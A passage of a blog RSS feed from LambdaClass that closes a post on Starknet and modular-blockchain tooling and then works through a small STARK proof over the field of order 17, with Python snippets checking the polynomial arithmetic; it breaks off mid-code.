          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-are-shaping-the-future-of-modular-blockchains-with-zero-knowledge-proof-verifications-in-ethereum/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-are-shaping-the-future-of-modular-blockchains-with-zero-knowledge-proof-verifications-in-ethereum/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-are-shaping-the-future-of-modular-blockchains-with-zero-knowledge-proof-verifications-in-ethereum/">&lt;p&gt;We believe in a permissionless future where individuals can cooperate and coordinate in scalable blockchain environments. With ten years of experience in distributed systems and a new obsession with cryptography, we can help builders achieve their goals.&lt;&#x2F;p&gt;
&lt;p&gt;To realize this future, developers need tooling they do not yet have to create products that compete with the UI&#x2F;UX of Web2. For the past year, we have been collaborating with StarkWare because the technology they have brought to the world will allow us to fulfill this objective. Specifically, STARKs and Cairo have not only been a major breakthrough in Computer Science but have also been battle-tested in StarkEx and, more recently, in Starknet.&lt;&#x2F;p&gt;
&lt;p&gt;Unlike most other solutions, StarkEx has been in production for years, already serving millions of users and facilitating over 850B USD in trades since its inception. It’s not a permissionless system, though; that is what Starknet brings to the table. Its ecosystem already has more than 900 experienced and talented developers bringing new products to the world. We are confident that, while Starknet may encounter problems, we will be able to overcome them. We trust that the quality of the engineers at StarkWare, in our own team, and in the Starknet community is among the best in the world.&lt;&#x2F;p&gt;
&lt;p&gt;We do recognize that there is still much work to be done. Specifically, it’s really important to be able to launch sequencers and provers. We also want to have light clients and support interoperable protocols such as IBC. A great example of this is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;polymerlabs.medium.com&#x2F;zkmint-the-first-zk-friendly-tendermint-consensus-engine-116000b9d4f9&quot;&gt;zkMint&lt;&#x2F;a&gt;. These are some examples of the things that are missing to build the future of modular blockchains:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Sovereign rollups where the data availability is stored in another chain like Bitcoin, Celestia or other systems&lt;&#x2F;li&gt;
&lt;li&gt;Hybrid rollups using both optimistic and zero-knowledge techniques to get the best of both worlds&lt;&#x2F;li&gt;
&lt;li&gt;ZK storage proofs to be able to move assets between chains in a safer manner&lt;&#x2F;li&gt;
&lt;li&gt;Safer wrapped assets&lt;&#x2F;li&gt;
&lt;li&gt;Multichain orderbooks that use the liquidity of multiple chains&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;We’re working, both internally and with other companies, to build these tools and products.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;our-work-in-the-starknet-ecosystem&quot;&gt;Our work in the Starknet ecosystem:&lt;&#x2F;h3&gt;
&lt;p&gt;We developed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;cairo-rs&quot;&gt;cairo-rs&lt;&#x2F;a&gt;, which is now 150 times faster than the initial implementation. Over the last three months we have worked on our implementation of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;starknet_in_rust&quot;&gt;starknet_in_rust&lt;&#x2F;a&gt;. With starknet_in_rust and the cairo-rs VM we can now receive and execute transactions.&lt;&#x2F;p&gt;
&lt;p&gt;We have also been making great progress on a Cairo STARK prover in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;LambdaWorks&lt;&#x2F;a&gt;. LambdaWorks is a library designed for building provers and verifiers for SNARKs in general, but the first thing we built is the Cairo STARK prover. We still have to implement proving for the builtins. Hopefully, with the help of StarkWare, we will have this done in the upcoming weeks.&lt;&#x2F;p&gt;
&lt;p&gt;We’re also working on a Proof of Concept for a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;starknet_tendermint_sequencer&quot;&gt;Starknet sequencer built with Tendermint Core&lt;&#x2F;a&gt; that can serve as a learning path toward decentralizing L2s such as Starknet. Yesterday we were happy to learn that the community took up this effort and added support for Sovereign Rollups on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;celestia.space&#x2F;&quot;&gt;Celestia&lt;&#x2F;a&gt; using &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rollkit&#x2F;&quot;&gt;Rollkit&lt;&#x2F;a&gt;. We’re also working on a Sovereign Rollup to Bitcoin with Cairo and Starknet.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;broke: starknet as rollup with enshrined settlement layer&lt;br &#x2F;&gt;
woke: starknet as sovereign rollup on celestia&lt;&#x2F;p&gt;
&lt;p&gt;starknet &amp;lt;&amp;gt; rollkit &amp;lt;&amp;gt; celestia &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;t.co&#x2F;h77HajcL2j&quot;&gt;pic.twitter.com&#x2F;h77HajcL2j&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;— kari (@ammarif_) &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;ammarif_&#x2F;status&#x2F;1632680324290453506?ref_src=twsrc%5Etfw&quot;&gt;March 6, 2023&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;The Starknet sequencer will be &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;starknet-on-to-the-next-challenge-96a39de7717&quot;&gt;decentralized&lt;&#x2F;a&gt;. With multiple sequencers it would be unnecessary to generate an execution trace, since the sequencers can compare their results and let the prover generate the trace and the proof that is then checked on Ethereum L1.&lt;br &#x2F;&gt;
This opens the door to compiling Cairo 1.0 into &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mlir.llvm.org&#x2F;&quot;&gt;MLIR&lt;&#x2F;a&gt; so that programs can be executed much faster by the sequencer. Therefore, we are currently working on a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;cairo_sierra_2_MLIR&quot;&gt;Cairo to MLIR compiler&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;It’s very unlikely that Starknet will implement a hybrid approach combining an optimistic and a ZK rollup at the same time, but it would be possible to do so. In addition, as we have mentioned before, data availability could be handled on a different chain.&lt;&#x2F;p&gt;
&lt;p&gt;We’re also working on other projects in Starknet that will be made public in the upcoming weeks.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;how-we-think-that-zk-can-empower-builders-to-create-a-future-with-modular-blockchains-and-more-powerful-applications&quot;&gt;How we think that ZK can empower builders to create a future with modular blockchains and more powerful applications&lt;&#x2F;h3&gt;
&lt;p&gt;We are also trying to help projects that will help create a modular ecosystem but that have Ethereum and ZK as the main building blocks.&lt;&#x2F;p&gt;
&lt;p&gt;Some of these projects are:&lt;br &#x2F;&gt;
&lt;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.herodotus.dev&#x2F;&quot;&gt;Herodotus&lt;&#x2F;a&gt;&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
The Herodotus team is trying to bring interoperability and synchronism back to the Ethereum ecosystem. To do so, they leverage a cryptographic protocol called Storage Proofs that allows developers to read, access, and process on-chain data. Developers will utilize Storage Proofs to process data from Chain A to execute certain logic on Chain B. This is incredibly useful for building multichain (L2 to L2 only, for now) applications like secure bridges and multichain lending.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.gizatech.xyz&#x2F;&quot;&gt;Giza&lt;&#x2F;a&gt;&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
On the other hand, Giza is utilizing Cairo to make on-chain Machine Learning a reality. This will be incredibly useful for on-chain gaming, advanced DeFi protocols, and zkML. That said, we think that once proving can be done faster, it will be possible to prove the training and inference of ML models. This will be crucial to running complex ML models off-chain and verifying them on-chain.&lt;&#x2F;p&gt;
&lt;p&gt;We understand that this will not be a simple road, but we are excited to embark on this journey with our partners and test our abilities. In the last few years, here at LambdaClass, we have become a software powerhouse that specializes in developing critical infrastructure and our own products. We have had incredible growth, but we also believe we must empower other developer teams and communities, so stay tuned for further updates on our progress.&lt;&#x2F;p&gt;
&lt;p&gt;If you want to hack with us, send us an email at &lt;a href=&quot;mailto:federico@lambdaclass.com&quot;&gt;federico@lambdaclass.com&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Diving DEEP FRI in the STARK world: learning your daily moon math with a concrete example</title>
          <pubDate>Mon, 06 Mar 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/diving-deep-fri/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/diving-deep-fri/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/diving-deep-fri/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;At LambdaClass, we are building &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;Lambdaworks&lt;&#x2F;a&gt;, a library for developing zero-knowledge stuff. One important proof system is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;046.pdf&quot;&gt;STARKs&lt;&#x2F;a&gt; (Scalable, transparent arguments of knowledge). STARKs are a powerful tool that allows us to prove the integrity of a given computation. For an overview of STARKs, you can look at our &lt;a href=&quot;&#x2F;lambdaworks-or-how-we-decided-to-created-our-zksnarks-library-and-a-stark-prover&#x2F;t&quot;&gt;previous post&lt;&#x2F;a&gt; or the excellent tutorials by Starkware, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;starkware.co&#x2F;stark-101&#x2F;&quot;&gt;STARK-101&lt;&#x2F;a&gt; (for the rust version, you can follow &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;STARK101-rs&#x2F;&quot;&gt;this link&lt;&#x2F;a&gt;) and the posts on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;arithmetization-i-15c046390862&quot;&gt;arithmetization I&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;arithmetization-ii-403c3b3f4355&quot;&gt;II&lt;&#x2F;a&gt;, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;aszepieniec.github.io&#x2F;stark-anatomy&#x2F;overview&quot;&gt;Anatomy of a STARK&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we will do a pen-and-paper example of STARKs, so we can follow all the steps needed to generate and validate a proof (we will skip the hashing part, though). One important aspect to point out is that, in this case, we are not interested in the security properties of what we do (but it should really matter in real life). Let’s jump into the problem…&lt;&#x2F;p&gt;
&lt;h2 id=&quot;problem-statement&quot;&gt;Problem statement&lt;&#x2F;h2&gt;
&lt;p&gt;Suppose we want to compute a sequence given by the following relations:&lt;br &#x2F;&gt;
$a_0=3$&lt;br &#x2F;&gt;
$a_{n+1}={a_n}^2$&lt;br &#x2F;&gt;
The sequence gives the square of the previous number, starting with the value 3. We will use as modulus the prime 17 (a Fermat prime, $2^4+1$), and we will understand all operations to be done modulo 17. The advantage of 17 is that its multiplicative group has 16 elements, which is helpful for STARKs (in general, we want $p-1$ to be $2^m\times q$, where $m$ should be sufficiently large and $q$ is odd). The first four elements of the sequence are:&lt;br &#x2F;&gt;
$a_0 = 3$&lt;br &#x2F;&gt;
$a_1 = {a_0}^2 = 9$&lt;br &#x2F;&gt;
$a_2 = {a_1}^2 = 9^2 = 81 \equiv 13 \pmod{17}$&lt;br &#x2F;&gt;
$a_3 = {a_2}^2 = 13^2 = 169 \equiv 16 \pmod{17}$&lt;br &#x2F;&gt;
The first step is to interpret these values as evaluations of a polynomial over a suitable domain. We are working with $p=17$, whose multiplicative group has 16 elements: $\{ 1 , 2 , 3 , 4 , \dots , 15 , 16 \}$. We will choose the following subgroup $D_t = \{ 1 , 13 , 16, 4 \}$, which is none other than the group formed by all powers of $13$ modulo $17$:&lt;br &#x2F;&gt;
$13^0 = 1$&lt;br &#x2F;&gt;
$13^1 = 13$&lt;br &#x2F;&gt;
$13^2 = 169 \equiv 16 \pmod{17}$&lt;br &#x2F;&gt;
$13^3 \equiv 4 \pmod{17}$&lt;br &#x2F;&gt;
$13^4 \equiv 1 \pmod{17}$&lt;br &#x2F;&gt;
From now on, we will drop the $\pmod{17}$ as understood from the context. We see that the powers of $13$ repeat every 4, which is the order of the element in the multiplicative group. Using this and calling the polynomial interpolating the trace as $t(x)$, we have:&lt;br &#x2F;&gt;
$t(1) = 3$&lt;br &#x2F;&gt;
$t(13) = 9$&lt;br &#x2F;&gt;
$t(16) = 13$&lt;br &#x2F;&gt;
$t(4) = 16$&lt;&#x2F;p&gt;
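&lt;p&gt;As a sanity check, the trace and the interpolation domain above can be reproduced with a few lines of Python (a sketch of the pen-and-paper computation; everything is done modulo 17):&lt;&#x2F;p&gt;

```python
# Squaring sequence a_{n+1} = a_n^2 over F_17, plus the interpolation
# domain generated by g = 13 (an element of order 4).
P = 17

trace = [3]
for _ in range(3):
    trace.append(trace[-1] ** 2 % P)

g = 13
domain = [pow(g, k, P) for k in range(4)]

print(trace)   # [3, 9, 13, 16]
print(domain)  # [1, 13, 16, 4]
```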
&lt;h2 id=&quot;interpolation&quot;&gt;Interpolation&lt;&#x2F;h2&gt;
&lt;p&gt;We can use Lagrange interpolation to find the polynomial (for larger problems, it is best to use the Fast-Fourier Transform):&lt;br &#x2F;&gt;
$t(x) = L_1(x)t(1) + L_2(x)t(13) + L_3(x)t(16) + L_4(x)t(4)$&lt;br &#x2F;&gt;
The Lagrange polynomial $L_1(x)$ is given by&lt;br &#x2F;&gt;
$$L_1(x) = \frac{(x-13)(x-16)(x-4)}{(1-13)(1-16)(1-4)}$$&lt;br &#x2F;&gt;
Doing the operations, we get&lt;br &#x2F;&gt;
$L_1 (x)t(1) = 5(x^3 + x^2 + x + 1)$&lt;br &#x2F;&gt;
The other polynomials are&lt;br &#x2F;&gt;
$L_2 (x)t(13) = 8x^3 + 2x^2 + 9x + 15$&lt;br &#x2F;&gt;
$L_3 (x)t(16) = x^3 + 16x^2 + x + 16$&lt;br &#x2F;&gt;
$L_4 (x)t(4) = 16x^3 + 13x^2 + x + 4$&lt;br &#x2F;&gt;
The trace interpolating polynomial is thus&lt;br &#x2F;&gt;
$t(x) = 13x^3 + 2x^2 + 16x + 6$&lt;br &#x2F;&gt;
If we evaluate the polynomial at $D_t$, you can check that we get the same values as in the trace execution table.&lt;&#x2F;p&gt;
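&lt;p&gt;The interpolation can be checked with a straightforward Lagrange routine over $\mathbb{F}_{17}$ (a minimal sketch; coefficient lists are stored from the constant term upward):&lt;&#x2F;p&gt;

```python
# Lagrange interpolation over F_17: recover t(x) from the four
# (domain point, trace value) pairs.
P = 17

def interpolate(xs, ys, p):
    n = len(xs)
    coeffs = [0] * n
    for i in range(n):
        num = [1]        # numerator of L_i(x), low-degree first
        denom = 1
        for j in range(n):
            if j == i:
                continue
            # num *= (x - xs[j])
            new = [0] * (len(num) + 1)
            for k, c in enumerate(num):
                new[k + 1] = (new[k + 1] + c) % p
                new[k] = (new[k] - xs[j] * c) % p
            num = new
            denom = denom * (xs[i] - xs[j]) % p
        scale = ys[i] * pow(denom, -1, p) % p
        coeffs = [(a + scale * b) % p for a, b in zip(coeffs, num)]
    return coeffs

t = interpolate([1, 13, 16, 4], [3, 9, 13, 16], P)
print(t)  # [6, 16, 2, 13]  ->  t(x) = 13x^3 + 2x^2 + 16x + 6
```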
&lt;h2 id=&quot;committing-to-the-trace-polynomial&quot;&gt;Committing to the trace polynomial&lt;&#x2F;h2&gt;
&lt;p&gt;We have to commit to the trace interpolating polynomial. To do so, we perform a low-degree extension by choosing a larger domain, different from the original one. If we choose $h = 9$ and its powers, we get a cyclic subgroup with $8$ elements, $\{ h^0 , h^1 , h^2 , \dots , h^7 \}$. This group contains elements from $D_t$, so we shift it by a coset offset $w$, forming the following domain,&lt;br &#x2F;&gt;
$$ D_0 = \{ wh^0 , wh^1 , wh^2, \dots , wh^7 \}$$&lt;br &#x2F;&gt;
We can choose $w = 3$, and so the domain becomes&lt;br &#x2F;&gt;
$$ D_0 = \{ 3, 10, 5, 11, 14 , 7 , 12 , 6 \}$$&lt;br &#x2F;&gt;
To commit, we evaluate $t(x)$ over all values in $D_0$ and form a Merkle tree whose leaves are those values.&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$x$&lt;&#x2F;th&gt;&lt;th&gt;$t(x)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;11&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;td&gt;16&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
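&lt;p&gt;The table can be reproduced by evaluating $t(x)$ over the coset (a sketch covering only the evaluations; the Merkle tree construction is omitted):&lt;&#x2F;p&gt;

```python
# Low-degree extension: evaluate t over the coset D_0 = 3 * <9> in F_17.
# In a real prover, these evaluations become the Merkle-tree leaves.
P = 17
t = [6, 16, 2, 13]           # t(x) = 13x^3 + 2x^2 + 16x + 6, low-degree first

def ev(poly, x, p):
    return sum(c * pow(x, k, p) for k, c in enumerate(poly)) % p

D0 = [3 * pow(9, k, P) % P for k in range(8)]
print(D0)                         # [3, 10, 5, 11, 14, 7, 12, 6]
print([ev(t, x, P) for x in D0])  # [15, 4, 10, 13, 16, 0, 0, 7]
```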
&lt;h2 id=&quot;enter-the-constraints&quot;&gt;Enter the constraints&lt;&#x2F;h2&gt;
&lt;p&gt;We now need to focus on the constraints that the calculation imposes on the trace elements. In this problem, we have two constraints:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Boundary condition. This applies to the first row, where $t(1)=3$.&lt;&#x2F;li&gt;
&lt;li&gt;Transition constraint. These are given by the multivariate polynomial $P(x,y) = y - x^2$, where if $x = a_n$, then $y = a_{n+1}$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;What we need to do at this point is compose the trace polynomial with these constraints to enforce them over the whole trace.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;boundary-constraint&quot;&gt;Boundary constraint&lt;&#x2F;h3&gt;
&lt;p&gt;The first constraint is&lt;br &#x2F;&gt;
$p_1 (x) = t(x)-3$&lt;br &#x2F;&gt;
To ensure that it is enforced on the first step, the polynomial $p_1 (x)$ must be divisible by $x-1$ (a property of polynomials says that $p(a)=b$ if and only if $r(x) = p(x)-b$ is divisible by $x-a$).&lt;br &#x2F;&gt;
We have&lt;br &#x2F;&gt;
$p_1 (x) = 13x^3 + 2x^2 + 16x + 3$&lt;br &#x2F;&gt;
If we factorize this polynomial, we get&lt;br &#x2F;&gt;
$p_1 (x) = 13(x-1)(x^2 + 9x + 5)$&lt;br &#x2F;&gt;
which has the factor $(x-1)$. If we divide, we get&lt;br &#x2F;&gt;
$C_1 (x) = 13 (x^2 + 9x + 5)$&lt;br &#x2F;&gt;
You can check that if we want $t (x) - a$ to be divisible by $x-1$, then necessarily $a=3$.&lt;&#x2F;p&gt;
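&lt;p&gt;The quotient $C_1(x)$ can be checked with synthetic division by $(x-1)$ over $\mathbb{F}_{17}$; a remainder of $0$ confirms that $t(1)=3$:&lt;&#x2F;p&gt;

```python
# Boundary constraint: p_1(x) = t(x) - 3 must be divisible by (x - 1).
P = 17
p1 = [3, 16, 2, 13]           # 13x^3 + 2x^2 + 16x + 3, low-degree first

def divide_linear(poly, a, p):
    """Divide poly (low-degree first) by (x - a); return (quotient, remainder)."""
    q = [0] * (len(poly) - 1)
    carry = 0
    for k in reversed(range(1, len(poly))):
        carry = (poly[k] + a * carry) % p
        q[k - 1] = carry
    return q, (poly[0] + a * carry) % p

C1, rem = divide_linear(p1, 1, P)
print(C1, rem)   # [14, 15, 13] 0  ->  C_1(x) = 13x^2 + 15x + 14 = 13(x^2 + 9x + 5)
```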
&lt;h3 id=&quot;transition-verification-constraint&quot;&gt;Transition verification constraint&lt;&#x2F;h3&gt;
&lt;p&gt;To evaluate the second constraint, we need to be able to relate an element of the trace to the next one. We can do this by noting that the elements of $D_t$ are generated by $g = 13$: if we select $x=x_0$, then $gx_0$ gives the next point. So, $y=t(gx)=t(13x)$ and&lt;br &#x2F;&gt;
$t(gx) = x^3 + 15x^2 + 4x + 6$&lt;br &#x2F;&gt;
We now replace these polynomials into the transition verification polynomial, $P(x,y)$, to get $p_2(x)$&lt;br &#x2F;&gt;
$p_2 (x) = P(t(x) , t(gx)) = x^6 + 16 x^5 + 5x^4 + 2x^3 + 7x^2 + 16x + 4$&lt;br &#x2F;&gt;
You can check that if we choose $x \in \{ 1, 13, 16 \}$ the polynomial evaluates to $0$. This is expected, since the elements $a_n$ and $a_{n+1}$ are linked by the formula $a_{n+1}= {a_n}^2$. This is no longer the case for $4$ since there is no next element. As before, if the constraints are valid, then $p_2 (x)$ should be divisible by $Z_2 (x)$, which is the vanishing polynomial over the domain where the constraints are enforced. In our case,&lt;br &#x2F;&gt;
$Z_2 (x) = (x-1)(x-13)(x-16)$&lt;br &#x2F;&gt;
We can also write it as&lt;br &#x2F;&gt;
$$Z_2 = \frac{x^4 - 1}{x-4}$$&lt;br &#x2F;&gt;
where we just remove the elements in which the constraints are not enforced. We verified that $p_2 (x)=0$ for $x \in \{ 1, 13, 16 \}$, so $p_2 (x)$ has factors $(x-1)(x-13)(x-16)$. Its complete factorization is&lt;br &#x2F;&gt;
$p_2 (x) = (x-1)(x-13)(x-16)(x^3 + 12 x^2 + 9x + 16)$&lt;br &#x2F;&gt;
Thus,&lt;br &#x2F;&gt;
$$C_2 (x) = \frac{p_2 (x)}{Z_2 (x)} = x^3 + 12 x^2 + 9x + 16$$&lt;&#x2F;p&gt;
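&lt;p&gt;A short script verifies both the expansion of $p_2(x)$ and its exact division by $Z_2(x)$ (a sketch using naive polynomial arithmetic mod 17):&lt;&#x2F;p&gt;

```python
# Transition constraint: p_2(x) = t(13x) - t(x)^2 should be divisible by
# Z_2(x) = (x - 1)(x - 13)(x - 16) over F_17.
P = 17
t = [6, 16, 2, 13]

def pmul(a, b, p):
    out = [0] * (len(a) + len(b) - 1)
    for i, x in enumerate(a):
        for j, y in enumerate(b):
            out[i + j] = (out[i + j] + x * y) % p
    return out

def psub(a, b, p):
    n = max(len(a), len(b))
    a = a + [0] * (n - len(a)); b = b + [0] * (n - len(b))
    return [(x - y) % p for x, y in zip(a, b)]

t_g = [c * pow(13, k, P) % P for k, c in enumerate(t)]   # t(13x)
p2 = psub(t_g, pmul(t, t, P), P)
print(p2)  # [4, 16, 7, 2, 5, 16, 1] -> x^6 + 16x^5 + 5x^4 + 2x^3 + 7x^2 + 16x + 4

Z2 = [1]
for r in (1, 13, 16):
    Z2 = pmul(Z2, [-r % P, 1], P)

def pdiv(num, den, p):
    """Long division of num by den (both low-degree first, den monic here)."""
    num = num[:]
    q = [0] * (len(num) - len(den) + 1)
    inv = pow(den[-1], -1, p)
    for k in reversed(range(len(q))):
        q[k] = num[k + len(den) - 1] * inv % p
        for j, d in enumerate(den):
            num[k + j] = (num[k + j] - q[k] * d) % p
    return q, num

C2, rem = pdiv(p2, Z2, P)
print(C2)        # [16, 9, 12, 1] -> C_2(x) = x^3 + 12x^2 + 9x + 16
print(any(rem))  # False: the division is exact
```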
&lt;h2 id=&quot;the-constraint-composition-polynomial&quot;&gt;The (constraint) composition polynomial&lt;&#x2F;h2&gt;
&lt;p&gt;We are now in a condition to build the composition polynomial&lt;br &#x2F;&gt;
$$H(x) = C_1 (x) (\alpha_1 x^{ D - D_1 } + \beta_1 ) + C_2 (x) (\alpha_2 x^{ D - D_2 } + \beta_2 )$$&lt;br &#x2F;&gt;
where the $\alpha_k$ and $\beta_k$ are values provided by the verifier. The terms $D - D_k$ are added so that all the polynomials in the linear combination have the same degree. We want the total degree to be a power of $2$, so $D=4$.&lt;&#x2F;p&gt;
&lt;p&gt;Suppose the verifier samples as random coefficients the following: $\alpha_1 = 1$, $\beta_1 = 3$, $\alpha_2 = 2$, $\beta_2 = 4$. Then,&lt;br &#x2F;&gt;
$C_1 (x) (1 x^{ 4 - 2 } + 3 ) = 13x^4 + 15 x^3 + 2 x^2 + 11x + 8$&lt;br &#x2F;&gt;
$C_2 (x) (2 x^{ 4 - 3 } + 4 ) = 2x^4 + 11 x^3 + 15 x^2 + 13$&lt;br &#x2F;&gt;
Then,&lt;br &#x2F;&gt;
$H (x) = 15 x^4 + 9 x^3 + 11 x + 4$&lt;br &#x2F;&gt;
Splitting the polynomial into odd and even terms,&lt;br &#x2F;&gt;
$H_1 (x^2) = 15 x^4 + 4$&lt;br &#x2F;&gt;
$H_2 (x^2) = 9x^2 + 11$&lt;br &#x2F;&gt;
so that&lt;br &#x2F;&gt;
$H(x) = H_1 ( x^2 ) + x H_2 (x^2)$&lt;br &#x2F;&gt;
We can commit to the polynomial $H(x)$ or its parts, $H_1(x)$ and $H_2(x)$ by evaluating over $D_0$ and forming a Merkle tree.&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$x$&lt;&#x2F;th&gt;&lt;th&gt;$H_1(x)$&lt;&#x2F;th&gt;&lt;th&gt;$H_2(x)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;11&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
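&lt;p&gt;The composition polynomial and its even-odd split can be reproduced as follows (coefficient lists low-degree first):&lt;&#x2F;p&gt;

```python
# Build H(x) = C_1(x)(alpha_1 x^2 + beta_1) + C_2(x)(alpha_2 x + beta_2)
# over F_17, with the verifier's samples alpha_1=1, beta_1=3, alpha_2=2, beta_2=4.
P = 17
C1 = [14, 15, 13]        # C_1(x) = 13x^2 + 15x + 14
C2 = [16, 9, 12, 1]      # C_2(x) = x^3 + 12x^2 + 9x + 16

def pmul(a, b, p):
    out = [0] * (len(a) + len(b) - 1)
    for i, x in enumerate(a):
        for j, y in enumerate(b):
            out[i + j] = (out[i + j] + x * y) % p
    return out

def padd(a, b, p):
    n = max(len(a), len(b))
    a = a + [0] * (n - len(a)); b = b + [0] * (n - len(b))
    return [(x + y) % p for x, y in zip(a, b)]

H = padd(pmul(C1, [3, 0, 1], P), pmul(C2, [4, 2], P), P)
print(H)          # [4, 11, 0, 9, 15] -> H(x) = 15x^4 + 9x^3 + 11x + 4

H1, H2 = H[0::2], H[1::2]   # even-odd split: H(x) = H_1(x^2) + x*H_2(x^2)
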